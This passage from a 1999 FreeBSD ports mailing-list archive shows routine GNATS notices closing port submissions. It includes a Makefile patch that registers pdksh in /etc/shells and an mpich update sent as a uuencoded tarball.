07:50:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:50:14 -0800 (PST) From: Message-Id: <199912251550.HAA07011@freefall.freebsd.org> To: lioux@linf.unb.br, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15146: New port submition emulator/truereality, the TrueReality (TR) N64 emulator Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port submition emulator/truereality, the TrueReality (TR) N64 emulator State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:47:52 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:55:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6AFD414F3B; Sat, 25 Dec 1999 07:54:49 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA07409; Sat, 25 Dec 1999 07:54:49 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:54:49 -0800 (PST) From: Message-Id: <199912251554.HAA07409@freefall.freebsd.org> To: p@dancris.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15407: New Port: graphics/chbg Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New Port: graphics/chbg State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:51:35 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:57:16 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DB906152A4; Sat, 25 Dec 1999 07:57:07 -0800 (PST) (envelope-from sumikawa@FreeBSD.org) Received: (from sumikawa@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA07775; Sat, 25 Dec 1999 07:57:07 -0800 (PST) (envelope-from sumikawa@FreeBSD.org) Date: Sat, 25 Dec 1999 07:57:07 -0800 (PST) From: Message-Id: <199912251557.HAA07775@freefall.freebsd.org> To: varju@snapple.webct.com, sumikawa@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15670: port update for palm/jpilot Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: port update for palm/jpilot State-Changed-From-To: open->closed State-Changed-By: sumikawa State-Changed-When: Sun Dec 26 00:56:43 JST 1999 State-Changed-Why: commited, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:57:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 13ADE159D3; Sat, 25 Dec 1999 07:57:26 -0800 (PST) (envelope-from sumikawa@FreeBSD.org) Received: (from sumikawa@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA07898; Sat, 25 Dec 1999 07:57:26 -0800 (PST) (envelope-from sumikawa@FreeBSD.org) Date: Sat, 25 Dec 1999 07:57:26 -0800 (PST) From: Message-Id: <199912251557.HAA07898@freefall.freebsd.org> To: varju@snapple.webct.com, sumikawa@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15671: add plugin support to palm/jpilot port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: add plugin support to palm/jpilot port State-Changed-From-To: open->closed State-Changed-By: sumikawa State-Changed-When: Sun Dec 26 00:57:09 JST 1999 State-Changed-Why: commited, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:57:34 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D724915A17; Sat, 25 Dec 1999 07:57:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA07925; Sat, 25 Dec 1999 07:57:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:57:32 -0800 (PST) From: Message-Id: <199912251557.HAA07925@freefall.freebsd.org> To: wollman@khavrinen.lcs.mit.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15509: New port: p5-Chart-PNGgraph Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: p5-Chart-PNGgraph State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:55:01 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:59:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 008401586A; Sat, 25 Dec 1999 07:59:52 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA08229; Sat, 25 Dec 1999 07:59:52 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:59:52 -0800 (PST) From: Message-Id: <199912251559.HAA08229@freefall.freebsd.org> To: howardjp@wam.umd.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15258: New port: misc/party Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: misc/party State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:57:56 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8: 0: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 853181515E for ; Sat, 25 Dec 1999 08:00:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA08263; Sat, 25 Dec 1999 08:00:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from drago.cert.org.tw (drago.cert.org.tw [140.117.100.10]) by hub.freebsd.org (Postfix) with ESMTP id CC0DD14EA2 for ; Sat, 25 Dec 1999 07:52:40 -0800 (PST) (envelope-from foxfair@drago.cert.org.tw) Received: (from foxfair@localhost) by drago.cert.org.tw (8.9.3/8.9.3) id XAA15613; Sat, 25 Dec 1999 23:58:25 +0800 (CST) Message-Id: <199912251558.XAA15613@drago.cert.org.tw> Date: Sat, 25 Dec 1999 23:58:25 +0800 (CST) From: Foxfair Hu Reply-To: foxfair@drago.cert.org.tw To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15685: Update /etc/shells after installed pdksh Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15685 >Category: ports >Synopsis: Update /etc/shells after installed pdksh >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 08:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Foxfair Hu >Release: FreeBSD 3.4-STABLE i386 >Organization: >Environment: FreeBSD-3.4 w/ fresh ports tree. >Description: Update /etc/shells automatically after installed port/shells/pdksh. >How-To-Repeat: cd /usr/ports/shells/pdksh && make install cat /etc/shells >Fix: Apply this patch to pdksh/Makefile: --- Makefile.org Sat Dec 25 23:38:19 1999 +++ Makefile Sat Dec 25 23:44:12 1999 @@ -20,4 +20,11 @@ CONFIGURE_ENV= LDSTATIC=-static MAN1= ksh.1 +post-install: + @${ECHO} "Updating /etc/shells" + @${CP} /etc/shells /etc/shells.bak + @(${GREP} -v ${PREFIX}/bin/ksh /etc/shells.bak; \ + ${ECHO} ${PREFIX}/bin/ksh) > /etc/shells + @${RM} /etc/shells.bak + .include >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8: 3:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 34B2E14C9E; Sat, 25 Dec 1999 08:03:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA08618; Sat, 25 Dec 1999 08:03:08 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 08:03:08 -0800 (PST) From: Message-Id: <199912251603.IAA08618@freefall.freebsd.org> To: jmrobins@samurai.ruin.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15064: New port: mail/mailfilter Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: mail/mailfilter State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 08:00:09 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8: 6:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C4B9F14F3B; Sat, 25 Dec 1999 08:06:18 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA08913; Sat, 25 Dec 1999 08:06:13 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 08:06:13 -0800 (PST) From: Message-Id: <199912251606.IAA08913@freefall.freebsd.org> To: howardjp@wam.umd.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15264: New port: sysutils/orville-write Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: sysutils/orville-write State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 08:03:26 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8:11:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 486DA1527F; Sat, 25 Dec 1999 08:11:26 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA10228; Sat, 25 Dec 1999 08:11:26 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 08:11:26 -0800 (PST) From: Message-Id: <199912251611.IAA10228@freefall.freebsd.org> To: dan@freebsddiary.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15360: new port = logcheck Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port = logcheck State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 08:07:05 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8:14:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 30ED614E0A; Sat, 25 Dec 1999 08:14:39 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA10539; Sat, 25 Dec 1999 08:14:39 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 08:14:39 -0800 (PST) From: Message-Id: <199912251614.IAA10539@freefall.freebsd.org> To: arnej@pvv.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15024: new port: sysutils/detach Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port: sysutils/detach State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 08:11:51 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8:17:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DA61A14E0A; Sat, 25 Dec 1999 08:17:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA10870; Sat, 25 Dec 1999 08:17:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 08:17:38 -0800 (PST) From: Message-Id: <199912251617.IAA10870@freefall.freebsd.org> To: stephen@math.missouri.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15144: New port for hevea Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port for hevea State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 08:15:03 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8:21:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D6EDE14CBA; Sat, 25 Dec 1999 08:21:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA11268; Sat, 25 Dec 1999 08:21:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 08:21:50 -0800 (PST) From: Message-Id: <199912251621.IAA11268@freefall.freebsd.org> To: andy@icc.surw.chel.su, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15684: Update port: ftp/cftp Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: ftp/cftp State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 08:20:46 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 8:40: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D5AAF14FC5 for ; Sat, 25 Dec 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA12024; Sat, 25 Dec 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cielo.eece.unm.edu (cielo.eece.unm.edu [129.24.24.11]) by hub.freebsd.org (Postfix) with ESMTP id 6FC1D14D12 for ; Sat, 25 Dec 1999 08:37:36 -0800 (PST) (envelope-from dbader@eece.unm.edu) Received: from jalapeno.eece.unm.edu ([129.24.24.88] helo=eece.unm.edu) by cielo.eece.unm.edu with esmtp (Exim 2.12 #1) id 121uC9-0007Ab-00 for FreeBSD-gnats-submit@freebsd.org; Sat, 25 Dec 1999 09:37:29 -0700 Received: (from dbader@localhost) by eece.unm.edu (8.9.3+Sun/8.9.1) id JAA20184; Sat, 25 Dec 1999 09:37:28 -0700 (MST) Message-Id: <199912251637.JAA20184@eece.unm.edu> Date: Sat, 25 Dec 1999 09:37:28 -0700 (MST) From: "David A. Bader" Reply-To: "David A. Bader" To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15686: ports/mpich (UPDATE: 1.1.2 -> 1.2.0) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15686 >Category: ports >Synopsis: ports/mpich UPDATE to new version 1.2.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 08:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: David A. Bader >Release: FreeBSD 3.4-RELEASE i386 >Organization: The University of New Mexico >Environment: >Description: The following tarball should completely replace the /usr/ports/net/mpich directory. It upgrades the mpich package from version 1.1.2 to version 1.2.0 >How-To-Repeat: >Fix: begin 644 mpich-1.2.0.tgz M'XL("%#Q9#@``VUP:6-H+3$N,BXP+G1A<@#M7%MSVSBRSJOU*S!):BM9QY*H MJ^TYWA-9HFUM9%&KRR2IW5,LB@0EEGD;@G3LFO]?M(R1) MS5[[!>K^.)/R%)%0"Q!Z$7A>>$CNRQ9C^SD,>M[D9OUO6C8F/V04?&O_-_N] MCM3M0/^WI&Z_ZO_G2,7^=XSOW^I2L]GK=/;W?ZO;RON_UZ3]W^LT7Z#F=[>D M)/W)^_]VU$5OX@'`?D^D>JO>K$.;U#>_O447J&E*DM3IM:7VV5IKGYZMN[JA MMSM]S>CH9YWFNL:5T#D][5*=MM[5M&[W]*S3:IUBO=/LF/V^UCOK=?K=T_9I M4>>,ZK1:_;[>:_6E4ZSUC;71[;:Z9L?43;/;[73,L]I_NJ7^F"F?_[X6ZML? ML@)\^_K?[?::S/]W^I7_?Y:TV__L[XFV_GYU/.'_P=MW"_W?:35;E?]_CG1R MV]DUKH./G[_GV-=?[MW<@*T&M' M03""7H>>KY)`!TX#!.@_`Q-=E'X%)B(6NR#+1<"!E>6+1M!@ M-$:!!U:ZF+RMG5!1TPL0Z"5R$OUITY\.^AD97BQ3-*GQFM:4LE@1M#):1M$\ M*MGX*RL+U8Y3:>`\'*CTN+S21"MC'ZXXD]T> M_/1Z+:G=;'9I_`_;`*GR_\^1J/\//,?R&IH!/[KG.)X+>=4DX:./ZWJ^%/P] M>:M]WDU4Z:IP)KWKHV/XE22V M)-12Y_,&!\%;]%?X]0)5]PP,6X3;V5B5YW-U-?TP53Y.?XZ%L4TP^KUV_(IJ MJ>I5@/'E8J3>XX!8GOLW&%+-9N=M[?B(\M%/)`Q_:;Q%4'`-0*:PCBCJ]6OP,-="JP#O1@E+%6`IL4U;3)97;JPL^S@1E M9FY!9$5%T-'NTRY6PZ&\6"1/^O4'.+Y\_M]J=YCZX^]?Q^'YWY*:K4YZ_@>1 M7YM%A*UJ__\L"<(G_`7Y7A`2I'NVC?409@U$#O%@H'''^1$;(.@-E=+6``*- MH-E<0PL,9#E^_6WM%?HEGG`HP+]&5H"-\R-VE`"X;?K2F9C1JM=E@.;SY M-F&VSC98I8U8[VH\H6KT%`718Y$:5#Z>+N&?/+\X*FL3]@S@)2Y'XWGR&+7: MS6"A#I7IU?AZ-8>'>\2DEI'J8'X-59SHIJUMR,7+U[\/KR:#Z\57B/!\"`.M MAXO7O\_F\M7XT]=&4MXK-'9U.P*G1"*?MCL+1@G9(MVVL!O65@M972QN_O);])>_H->_)]17ZDZA M"/3O?Z-_,<>''RP2DC>Y86O+;4#13"\6>?/33IF@SI7YTP6:*F]K\]54'3I:'%-SH91S*%>9+Q?0A%\;!.M18(6/M/A"JX'\"3P`;;."'2]K]=B[UP:3 MB;H$87EY`7TWC>4NCHI-"BSIXNCH[Y'CDZT7UB7J[.%7W_H=E>#@GE#"QIIK M^3K-@]IP&/_5=?C[K]H1[6VSWX]!\ZP99R"$CC,!UCW7M#8)%;F)5DA"1].W M=%=4EZ@A;3!DZ-%-G!N2>ILM.ZVARFJ.T))X#CS<<+\;* M--6`8U;1L<4P03*!,*/;IY%4E!)0P#U<`V#C,EBFQPR)-^E)*7 M@^F(4[]4YBE#62Z5VY18P`A4E5_D^8T\&*7@)X5OI%@GO;:\&:0&@Z]?JM.5Y,) M3R_DR16O2;&/RGPRRH6X`003Z7J^DK,Q,=1<'=N\/FQ0(>[Q`H-D(A1A:P:/ MQ.TNJ#F:STL$FGO'TV1KF3LZ)%IS,H;E M-&%]*BIM`D\4XDUD-':\$&=R@G+"(]9O0K4[M&];85$WQ"2$L1!F(X=NO%4S M(`$D8^W?44VI7AC&&HY)&_D M5!9B_AN85A-8ACD#`D<=3D8,2<[+,4"5/\&ZN^!P.@$*NFQ.4.,N.)Y8VP1E!L)L]OU0_R9TZ,08(B0^C@+2K/Y>(3 MS@?3#SPI_V,E+Y8%O;FB\#KY4L0H9:9,E.O/!9TEA!4T;N0E8XL*6U9>+PBV M$$';X(@%K\+A!6?"<7)OQ8&$!^D^TM;82LGI`PK[7\O=)()7$V6PY//)3$Y5 MKBQ7LW-7DY)&0E_/![.;+`\C3)5O9TN^=6*4Z_AK?I&^SE9H1F&Z!D0N[\W"P`X>X*+ M_CUFPK*SP6G)13@I:D?C3I!-EAU1*@0Q8D/S,GDB*$1NWA,WBC#9;M)1+BX! MXU$>)XSY7"&(3!!)%&B)9"@NL,1HL= MGD*J>X:L>'V&970^GEYS\&RNT',]8-$#"+Z`<;H" M0RXOBCI0"`=FG\4@BL$C>2(OY9A!047PMXJ_&T\I@BN9#88?LEB!&L:K`\UO M9V::GCH$FN7#T!GL-\/`2WW+K#!BN"T?S7:X_&F69^MQ6GVFF0\UFN4W-W-^ M,S'/9,![ M)V%+FYSB9E2Z"USH&N\"%H*E"94^^B*?5PO.LDP7,&Y.IB1L'WQ;RYIH46BB MQQH$0\)VV$I>=[;&LDN%IP>4*#)J@;6IO(BX@@&[ME MRS7P`S;4M>VQ29%JYK938?P08E>HJC#0&+9AH8\;\@V2XMB]Q[;G[^AL$P-X M^>T]K/U>P$.YE*!MKWDA;A['=!A$^DYS1(*.4-5J.I*OQE.9=Q89Q@?>JRG, M\LP5K*:+\751*X;X(X@,2QP\PUQ?$]L]%>)GZHJ($48J_'$YOH4E8*%>3Y3+ MS)R/6C83:#8?5(P2!A5%N$'U,;0RSPCY%%<*`UCAJZ"OP#E'%).V1_B>9J`0 MGC`DGG""$!TJFN,9@AP#0\^Q="M\+--8/\)(]DPSCSPR5O$X(F-8$*H4A7V/ M6+2)5;*%"-#9;0:#Z$=.8JK:[RQW#(-5?32'"_<%0_WUQ%RA8DL M+S!P2=/PO,R\_1)E)9>W.<'XCA>E]%Y1<<@*C&3H"0H[W4GRD2.6_.CJO%S2 MZ[NMES%VNRAGE?01-XQVL`/UE'93S-O33P*SO*-$D=+"=]J?[4%RAQ237%RN M%,*GS*EE,51+:&#>,13M\Z%<&U9.3>P[?N"6/A25Y)0KID7]"T>"!77;HL%ICC.>SD9<0 MS!3\1<7WU.EQ&BD#PI/35Y[L""219[LVV]L0`8#> MYW0=LDFL923422M(27JT0J\V)"1$D72CRJD#PJL'.+,QA4+L^"H8P6N%$/5` MW\&*TH$.D.-?^CI'G5]?0@O:$$K$V%#SPRC`M&>3`AA*%T98DS1_:^DD%67' MZ[:WALTB.ZO@Y.FI3'ZVELK'(`O!1,A]"&'+R14PPO2X1C(2N1$F>F"M<=9O M`ICV6:8<:%]4W0IT.ZV'(;;EBK2WL?2BFN]9>0490'@D.#A@]50X/^IAZ$AJ"J%@>7 MN6)!*')%,2HRAZD0N$F[IWH+_&OBOF(A2N>FL_U8TJ(Q[?F%!J;ER9G"RC?8 MJ*R-IXLE]V;Z*+FR6ZO5K>3%_O^LB5&GK_;KSMW?JNN5?Z+$W?^\V_R@;T"_ M^?N/9JO5I'=!):G7JK[_?)8D]C]]"RE/E]^YCJ?N_R)ZY[?7;;7ZG6XO_OZS MW^I4]_^>(]W">JMM,)IIA,!ZC-@+`%/3,7H#QZK^7X\>&\QNX">R;]UH=N MF\$GB.ZBEKF+M]F%X#I:@O3&TVRJ"5KO$*$E/B*V2S+>T=I"#QF8G6LCK?;% M,C"P80=AY->*Z1U3NK&G3LF):SWQ$R<%>U2(RQU21P."2*1OJ8$U*W-=9.M% MMH'HFX"U#3L>^G`!C;]US7Z7/><[A$W3TND5UG<(:JV9-GZP:`,(1B25HZ3R M>GH;UD!:@*%D,[)M!%M;>-J:X>D1>ZM!RZ.?74&8C>W47H?:CA\TVKRD_M_A M4L7Y/YN,%]][]7]J_DO-3K^;QW_M+IO_O>K[SV=)R>WYV?BD=3(\/FZDPS.[ M4%][4@)VD?N%YO)@="OOY^M;S:?G+U)3!9E67=?WRVZQ;7OJ%R^PC8-R\87G M_7S?.JC.SE8."<#&VX.-]^-!H8B^>5JSJ[J9&+TOCA^PC@,.<'R<7M8N1^NP MC1\"DE&.P-;1=SK/I.2`YR.R4,X-#FL$!35A^'O7R?DSS@&LL=8NX&J4\J`>GY7AGN[Z+,.QX?Y]ZFW!]R7K!=-TM`^BU)[B]X MCK\KSR([;'F9._5H;EYZQE3-H*)3CU364X>Z%;8B8FW[Q4\9-CZX/,O<7CK,[R4^P#Q3QH&.?G9>7<=,+'>769]S]Q<=W M&_9R]BMN,?T(KY1EI5+O[^[O:?Z&__<*_ZA_O,W]_` M_I[F\P^V7Q"_:#_(/*!.V/6[0[P#REG46\8]9-B3=ATPZRFK#AJ5,D5UVUK3 M?QIU^YJ(F8PJHG:))%W&=B'5]4IE@8!A4`:7@F8Y"J%RD>&7%D+H>EG`PJ)A MU%Q862L09I#`R[[$I1<2 MUL0H9R:*[PTK"!P4B^QN./?P11@,+0!\1%S"$B&(AT6@O')N#I8R1)".N_@J MT@XN`LE0E$K1=BG:V4$+`#=21`[9:2IFHP#]=YS@5:E*5:I2E:I4I2I5J4I5 HJE*5JE2E*E6I2E6J4I6J5*4J5:E*5:I2E:I4I3][^G_/$N)``'@``"I5 ` end -- David A. Bader, Ph.D. Office: 505-277-6724 Dept of Electrical and Computer Engineering FAX: 505-277-1439 EECE Building University of New Mexico dbader@eece.unm.edu Albuquerque, NM 87131 http://www.eece.unm.edu/~dbader >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 9:18: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E13814E1A; Sat, 25 Dec 1999 09:18:04 -0800 (PST) (envelope-from sada@FreeBSD.org) Received: (from sada@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA16443; Sat, 25 Dec 1999 09:18:03 -0800 (PST) (envelope-from sada@FreeBSD.org) Date: Sat, 25 Dec 1999 09:18:03 -0800 (PST) From: Message-Id: <199912251718.JAA16443@freefall.freebsd.org> To: sada@FreeBSD.org, freebsd-ports@FreeBSD.org, torstenb@FreeBSD.org Subject: Re: ports/12403: ssh port has undocumented X11 dependency Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ssh port has undocumented X11 dependency Responsible-Changed-From-To: freebsd-ports->torstenb Responsible-Changed-By: sada Responsible-Changed-When: Sat Dec 25 09:15:54 PST 1999 Responsible-Changed-Why: Over to the maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 9:24:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from baerenklau.de.freebsd.org (baerenklau.de.freebsd.org [195.185.195.14]) by hub.freebsd.org (Postfix) with ESMTP id 10C8614C9C for ; Sat, 25 Dec 1999 09:24:12 -0800 (PST) (envelope-from wosch@panke.de.freebsd.org) Received: (from uucp@localhost) by baerenklau.de.freebsd.org (8.8.8/8.8.8) with UUCP id SAA24454; Sat, 25 Dec 1999 18:24:10 +0100 (CET) (envelope-from wosch@panke.de.freebsd.org) Received: (from wosch@localhost) by paula.panke.de.freebsd.org (8.9.3/8.8.8) id RAA00360; Sat, 25 Dec 1999 17:39:20 +0100 (CET) (envelope-from wosch) Date: Sat, 25 Dec 1999 17:39:20 +0100 (CET) Message-Id: <199912251639.RAA00360@paula.panke.de.freebsd.org> From: Wolfram Schneider To: ports@freebsd.org Subject: New ports added/updated last two weeks Reply-To: ports@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Introduction - ------------ The FreeBSD Ports Collection offers a simple way for users and administrators to install applications. Each "port" 